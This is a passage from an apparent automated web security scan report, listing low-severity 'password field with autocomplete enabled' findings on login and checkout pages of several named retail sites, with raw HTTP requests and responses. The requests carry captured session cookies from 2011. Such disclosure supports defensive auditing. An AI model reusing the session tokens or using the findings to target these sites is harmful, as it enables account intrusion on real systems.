Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/528/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.33. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL: https://ordering.ftd.com/528/signin/ (the billing_page_signin_popup form). The form contains the following password field with autocomplete enabled: password.

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/528/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

14.34. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL: "" (the create_account form posts to the current page, /sweet-shop-ctg/product-sweet-shop/). The form contains the following password fields with autocomplete enabled: password, password_ver.

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.35. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The page contains a form with the following action URL: https://ordering.ftd.com/528/signin/ (the toolbar_signin_form form). The form contains the following password field with autocomplete enabled: password.

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/528/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.36. https://www.gnc.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL: /coreg/index.jsp (the otracking_sign_in form). The form contains the following password field with autocomplete enabled: password.

Request

GET /checkout/index.jsp?process=orderTrackingLogin HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 93720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<tr>
                           <form name="otracking_sign_in" action="/coreg/index.jsp" method="post">
                           <INPUT TYPE="hidden" NAME="step" VALUE="otlogin">
...[SNIP]...
<td class="checkbg_lt" align="left"><input type="password" size=20 value="" name="password"></td>
...[SNIP]...

14.37. https://www.guitarcenter.com/MyAccount/Login.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /MyAccount/Login.aspx

Issue detail

The page contains a form with the following action URL: Login.aspx?goto=%2fMyAccount%2fDefault.aspx (the aspnetForm form). The form contains the following password field with autocomplete enabled: ctl00$CenterContent$ctl00$password.

Request

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:11:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 32
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 27444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div>

<form name="aspnetForm" method="post" action="Login.aspx?goto=%2fMyAccount%2fDefault.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left">
                                            <input name="ctl00$CenterContent$ctl00$password" type="password" id="ctl00_CenterContent_ctl00_password" size="10" class="inputGen" />
&nbsp;
&nbsp;
                                           </td>
...[SNIP]...

14.38. https://www.helzberg.com/account/login.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /account/login.do

Issue detail

The page contains a form with the following action URL: /account/login.do?method=view (the accountRegisterForm form). The form contains the following password field with autocomplete enabled: loginPassword.

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511291580}; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA; JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: JSP/2.1
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 10:45:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:10 GMT
Connection: keep-alive
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 10:45:10 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 10:45:10 GMT; Path=/
Content-Length: 39770


       
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" width="738">

   <form name="accountRegisterForm" method="post" action="/account/login.do?method=view" id="mainForm">

<tr valign="top">
...[SNIP]...
<div><input type="password" name="loginPassword" maxlength="50" size="15" value="" class="login"></div>
...[SNIP]...

14.39. https://www.orderhouse.com/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /default.aspx

Issue detail

The page contains a form with the following action URL: dp.aspx (the aspnetForm form). The form contains the following password field with autocomplete enabled: Skin$WB_POTID271$txtPassword.

Request

GET /default.aspx HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:13 GMT
Content-Length: 65618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<body bgcolor="#003366" leftmargin="0" topmargin="0">
   
       <form name="aspnetForm" method="post" action="dp.aspx" id="aspnetForm">
<div>
...[SNIP]...
</span><input name="Skin$WB_POTID271$txtPassword" type="password" maxlength="16" id="Skin_WB_POTID271_txtPassword" onkeydown="javascript:Login(event)" style="font-size:XX-Small;height:17px;width:80px;" /></td>
...[SNIP]...

14.40. https://www.orderhouse.com/dp.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /dp.aspx

Issue detail

The page contains a form with the following action URL: dp.aspx?pgid=-1&sto=1 (the aspnetForm form). The form contains the following password field with autocomplete enabled: Skin$WB_POTID271$txtPassword.

Request

GET /dp.aspx?pgid=-1&sto=1 HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/dp.aspx?pgid=-22
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:09:50 GMT
Content-Length: 65680


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<body bgcolor="#003366" leftmargin="0" topmargin="0">
   
       <form name="aspnetForm" method="post" action="dp.aspx?pgid=-1&amp;sto=1" id="aspnetForm">
<div>
...[SNIP]...
</span><input name="Skin$WB_POTID271$txtPassword" type="password" maxlength="16" id="Skin_WB_POTID271_txtPassword" onkeydown="javascript:Login(event)" style="font-size:XX-Small;height:17px;width:80px;" /></td>
...[SNIP]...

14.41. https://www.orderhouse.com/dp.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.orderhouse.com
Path:   /dp.aspx

Issue detail

The page contains a form with the following action URL: dp.aspx?pgid=-22 (the aspnetForm form). The form contains the following password fields with autocomplete enabled: Skin$WB_POTID271$txtPassword, Skin$WB_POTIDneg4$txtPassword.

Request

GET /dp.aspx?pgid=-22 HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:44:18 GMT
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<body bgcolor="#003366" leftmargin="0" topmargin="0">
   
       <form name="aspnetForm" method="post" action="dp.aspx?pgid=-22" id="aspnetForm">
<div>
...[SNIP]...
</span><input name="Skin$WB_POTID271$txtPassword" type="password" maxlength="16" id="Skin_WB_POTID271_txtPassword" onkeydown="javascript:Login(event)" style="font-size:XX-Small;height:17px;width:80px;" /></td>
...[SNIP]...
<td><input name="Skin$WB_POTIDneg4$txtPassword" type="password" maxlength="16" id="Skin_WB_POTIDneg4_txtPassword" onkeydown="javascript:Login(event)" style="width:110px;" /></td>
...[SNIP]...

14.42. https://www.petsmart.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL: /coreg/index.jsp (the newCustomer form). The form contains the following password fields with autocomplete enabled: newPassword, newPassword2.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<tr>
                       <form name="newCustomer" onsubmit="valSignUp();return false;" action="/coreg/index.jsp" method="post">
                       <input type="hidden" name="step" value="signup">
...[SNIP]...
<br>
                           <input type="password" id="passwrd" size="18" name="newPassword" class="pagetext">
                           <br>
...[SNIP]...
<br>
                           <input type="password" id="confPasswrd" size="18" name="newPassword2" class="pagetext">
                           
   
                                                                                                               <br>
...[SNIP]...

14.43. https://www.petsmart.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL: /coreg/index.jsp (the returningCustomer form). The form contains the following password field with autocomplete enabled: password.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
